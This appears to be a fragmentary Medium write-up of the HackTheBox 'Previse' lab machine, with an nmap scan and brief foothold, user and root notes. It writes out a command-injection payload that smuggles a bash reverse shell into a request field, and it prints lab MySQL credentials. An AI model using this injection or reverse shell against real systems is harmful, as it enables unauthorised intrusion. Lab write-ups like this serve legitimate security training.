HackTheBox — Previse

Nmap Scan

nmap -sC -sV -oA previse 10.10.11.104

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating HTTP

Going to http://10.10.11.104 redirects us to http://10.10.11.104/login.php

Initial Foothold

Lets replace the ping command with a reverse shell and run a netcat listener. delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

Getting User

After some enumeration i couldn’t find anything but remember the mysql credentials we got before? lets login to mysql using root:mySQL_p@ssw0rd!:)

Getting Root

By running sudo -l we can run /opt/scripts/access_backup.sh as root.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store